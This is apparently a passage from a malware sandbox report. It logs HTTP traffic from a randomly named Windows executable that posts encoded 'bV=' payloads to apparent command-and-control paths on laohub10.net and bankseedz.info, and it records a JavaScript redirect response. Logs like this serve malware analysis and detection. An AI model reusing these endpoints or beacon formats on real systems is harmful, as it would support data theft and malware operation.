                                                                                                                  Dec 2, 2024 15:24:20.056024075 CET548INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:19 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 389
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.549863202.79.161.15180728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:26.166685104 CET759OUTPOST /n2c9/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.laohub10.net
                                                                                                                  Origin: http://www.laohub10.net
                                                                                                                  Referer: http://www.laohub10.net/n2c9/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 58 75 65 58 6d 6a 50 73 5a 6d 73 6d 78 4b 73 2b 47 78 63 54 63 35 73 68 4d 4c 2b 2f 57 6d 49 61 49 6b 4d 77 77 4b 68 67 37 55 6a 45 59 53 48 65 37 43 62 73 45 56 30 78 6c 43 55 6c 6f 52 33 4c 41 62 54 62 4f 43 74 2f 4c 75 30 52 49 6e 74 38 42 73 59 6c 6b 59 6f 73 6a 43 7a 4d 79 74 4d 79 46 4e 33 68 36 53 58 44 63 71 4c 54 38 49 68 4e 44 31 75 75 6f 79 48 47 78 72 54 62 2f 46 46 5a 4a 63 37 4f 75 6e 6c 39 58 4e 48 35 4d 4c 44 49 78 39 67 38 37 57 56 4d 76 4b 73 61 72 31 5a 43 7a 6e 4a 52 68 67 48 30 62 64 71 35 4e 54 59 74 2f 6c 53 5a 5a 7a 65 58 79 75 38 3d
                                                                                                                  Data Ascii: bV=6zXbcNT7Su38XueXmjPsZmsmxKs+GxcTc5shML+/WmIaIkMwwKhg7UjEYSHe7CbsEV0xlCUloR3LAbTbOCt/Lu0RInt8BsYlkYosjCzMytMyFN3h6SXDcqLT8IhND1uuoyHGxrTb/FFZJc7Ounl9XNH5MLDIx9g87WVMvKsar1ZCznJRhgH0bdq5NTYt/lSZZzeXyu8=
                                                                                                                  Dec 2, 2024 15:24:27.531204939 CET532INHTTP/1.1 200 OK
                                                                                                                  Server: Apache
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Cache-Control: max-age=86400
                                                                                                                  Age: 1
                                                                                                                  Connection: Close
                                                                                                                  Content-Length: 357
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.549869202.79.161.15180728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:28.848989010 CET779OUTPOST /n2c9/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.laohub10.net
                                                                                                                  Origin: http://www.laohub10.net
                                                                                                                  Referer: http://www.laohub10.net/n2c9/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 38 61 4a 47 55 77 78 49 4a 67 34 55 6a 45 51 79 48 62 31 69 62 33 45 56 6f 54 6c 48 38 6c 6f 52 6a 4c 41 61 6a 62 4a 31 35 38 4c 2b 30 54 4f 6e 74 2b 4f 4d 59 6c 6b 59 6f 73 6a 43 57 72 79 74 45 79 46 64 6e 68 34 7a 58 43 48 4b 4c 55 73 59 68 4e 48 31 75 71 6f 79 48 6b 78 71 66 68 2f 41 42 5a 4a 5a 58 4f 75 32 6c 36 5a 4e 48 2f 52 62 43 5a 33 50 31 6a 35 41 59 5a 6e 49 56 6d 71 6b 78 55 79 52 34 37 37 43 50 63 49 39 47 42 64 41 51 61 75 56 7a 77 44 51 4f 6e 73 35 72 4d 71 63 59 6d 55 71 47 33 32 52 55 63 5a 45 55 6b 42 2b 48 48
                                                                                                                  Data Ascii: bV=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXU8aJGUwxIJg4UjEQyHb1ib3EVoTlH8loRjLAajbJ158L+0TOnt+OMYlkYosjCWrytEyFdnh4zXCHKLUsYhNH1uqoyHkxqfh/ABZJZXOu2l6ZNH/RbCZ3P1j5AYZnIVmqkxUyR477CPcI9GBdAQauVzwDQOns5rMqcYmUqG32RUcZEUkB+HH
                                                                                                                  Dec 2, 2024 15:24:30.245717049 CET532INHTTP/1.1 200 OK
                                                                                                                  Server: Apache
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Cache-Control: max-age=86400
                                                                                                                  Age: 1
                                                                                                                  Connection: Close
                                                                                                                  Content-Length: 357
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.549875202.79.161.15180728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:31.683051109 CET1796OUTPOST /n2c9/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.laohub10.net
                                                                                                                  Origin: http://www.laohub10.net
                                                                                                                  Referer: http://www.laohub10.net/n2c9/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 6b 61 4a 31 63 77 7a 70 4a 67 35 55 6a 45 61 53 48 61 31 69 62 36 45 56 67 58 6c 48 78 48 6f 54 62 4c 43 38 33 62 4d 41 56 38 42 2b 30 54 43 48 74 2f 42 73 59 77 6b 59 5a 72 6a 43 47 72 79 74 45 79 46 59 72 68 38 69 58 43 46 4b 4c 54 38 49 68 42 44 31 75 4f 6f 79 66 4f 78 71 62 78 2f 7a 4a 5a 49 34 37 4f 6f 41 52 36 47 39 48 39 51 62 43 42 33 50 70 47 35 47 39 33 6e 4d 64 59 71 6e 68 55 79 58 51 67 38 67 47 45 56 76 61 62 50 68 55 70 35 44 6a 31 49 67 2b 45 67 65 50 50 72 73 4d 33 58 76 48 77 36 77 52 62 41 42 41 70 49 4a 36 4b 53 6b 42 56 53 4a 66 57 46 78 39 36 6d 49 6e 68 75 4f 43 70 66 66 51 32 70 5a 33 45 46 52 69 73 74 45 61 4b 6a 4e 48 66 2b 71 74 72 6c 79 4b 34 4a 73 52 35 4c 4d 70 72 37 6a 47 67 55 7a 53 2f 4f 70 79 58 52 56 58 41 66 6f 4d 39 48 6b 4e 70 68 54 37 2f 51 6a 51 44 6e 52 71 6c 54 7a 45 35 59 6e 74 56 6c 77 71 52 59 65 64 6f 59 46 68 39 41 49 73 [TRUNCATED]
                                                                                                                  Data Ascii: bV=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXUkaJ1cwzpJg5UjEaSHa1ib6EVgXlHxHoTbLC83bMAV8B+0TCHt/BsYwkYZrjCGrytEyFYrh8iXCFKLT8IhBD1uOoyfOxqbx/zJZI47OoAR6G9H9QbCB3PpG5G93nMdYqnhUyXQg8gGEVvabPhUp5Dj1Ig+EgePPrsM3XvHw6wRbABApIJ6KSkBVSJfWFx96mInhuOCpffQ2pZ3EFRistEaKjNHf+qtrlyK4JsR5LMpr7jGgUzS/OpyXRVXAfoM9HkNphT7/QjQDnRqlTzE5YntVlwqRYedoYFh9AIsV5hiLM6qanJwV2Y3+gW8OMm39ujWL5Z20gcs2vhqmVd+5lP7ap82AWWig8q/UcexVvZYiZ8u5zRnSLqgYFM2F49aChu5K3VTP5qFiDufDVtKfgMnJuSX2y3tmAxNTESWzZ1mMhWo4XFbKj0Judyc45amZDbe+ru79odkbcyVqKmTZ1HzQUs4iQFS0uNcZhq0sf6GLh0BYY8cBG0leE2c7crEcg4Dh9Z9NH9lZyuTiX3W/gyjVswmV5TRrjHceQ9g2dKNNxaPHMTJSwVsoPuknjTrY9wP3OnePoxza4VDk5I8ZlWjLw6LHpubWTqlpBtGDdbad2w2/xWz/cNG51A0jar6b0qsBKW9LljeYA3R4etsbAi+ooNkbPxTT+9dznUnhomRJtPG9GlysTl4b9V2Xuy1wl+mi4cS6q72NJnB7YjtdH69jWSPGAH1loxKbFeAYa9EiGBqTJQyJa06C40E6R1o90L37fLn8RWuhJ/I2D53AFw+eXGbsoZiyky7saEp/1rltDy1R6uMisf/+CBuhemRMpoGXGH4aGzUbxayFm66rJnX1MklpaF3lcwZhUeLtaJ45aO597RqXfuYR0+EoK194mOHcaNCtLlPolZ0HXq5EyO0W4IBvq94EKrYvp7d53uvfJIa3xB73r7xiiRXjCFLDEAEZocdga [TRUNCATED]
                                                                                                                  Dec 2, 2024 15:24:32.998274088 CET532INHTTP/1.1 200 OK
                                                                                                                  Server: Apache
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Cache-Control: max-age=86400
                                                                                                                  Age: 1
                                                                                                                  Connection: Close
                                                                                                                  Content-Length: 357
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.549883202.79.161.15180728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:34.699871063 CET497OUTGET /n2c9/?bV=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvpOFGl3CcQklZlekjGrp+0XQqfczBPHNrv5hMhkDFTE+A==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.laohub10.net
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:24:35.873297930 CET532INHTTP/1.1 200 OK
                                                                                                                  Server: Apache
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Cache-Control: max-age=86400
                                                                                                                  Age: 1
                                                                                                                  Connection: Close
                                                                                                                  Content-Length: 357
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.54989946.30.211.3880728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:41.681350946 CET765OUTPOST /uf7y/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.bankseedz.info
                                                                                                                  Origin: http://www.bankseedz.info
                                                                                                                  Referer: http://www.bankseedz.info/uf7y/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 6f 72 59 56 50 2b 49 38 54 31 4a 78 35 76 6f 44 78 6d 33 75 6e 6c 48 68 4e 6b 4c 36 6b 74 57 76 55 37 76 64 74 4a 4c 70 41 45 45 32 6d 45 48 58 50 77 67 66 41 6f 4b 62 6a 2b 4e 69 61 61 36 72 75 45 4d 66 31 4f 38 7a 36 59 70 4c 6e 65 53 58 4f 45 4a 43 47 51 45 2b 35 6d 67 44 39 51 66 42 58 35 7a 32 46 32 33 69 76 4f 31 4e 79 5a 67 68 64 6d 33 49 71 59 41 52 6d 6f 34 52 34 44 30 6d 4b 32 57 36 37 65 56 46 4a 4f 47 34 64 4b 76 79 5a 36 35 6f 71 46 70 75 55 69 4f 52 44 53 31 45 6a 47 58 63 36 32 35 30 35 55 6b 54 61 76 56 44 49 57 55 58 74 30 4a 63 4d 65 73 3d
                                                                                                                  Data Ascii: bV=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65oqFpuUiORDS1EjGXc62505UkTavVDIWUXt0JcMes=
                                                                                                                  Dec 2, 2024 15:24:42.989131927 CET738INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.54990546.30.211.3880728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:44.352227926 CET785OUTPOST /uf7y/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.bankseedz.info
                                                                                                                  Origin: http://www.bankseedz.info
                                                                                                                  Referer: http://www.bankseedz.info/uf7y/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 62 6d 76 55 62 66 64 73 49 4c 70 4f 6b 45 32 31 45 48 57 58 51 67 41 41 6f 50 6d 6a 2b 78 69 61 61 75 72 75 42 6f 66 31 39 55 77 72 59 70 4a 76 2b 53 56 4b 45 4a 43 47 51 45 2b 35 6d 6c 4c 39 51 48 42 58 49 44 32 58 45 66 6a 7a 65 31 4f 7a 5a 67 68 5a 6d 32 67 71 59 41 2f 6d 70 6b 33 34 46 77 6d 4b 7a 53 36 37 72 70 4b 65 65 47 45 5a 4b 75 57 55 61 45 4b 6b 48 31 62 53 67 4f 59 64 6a 68 59 6d 77 6d 32 67 55 78 63 71 30 49 72 4b 38 64 30 5a 6d 31 2b 33 58 5a 73 53 4a 34 37 39 4a 36 33 58 50 33 32 73 6d 42 59 2f 6c 59 74 4c 71 36 5a
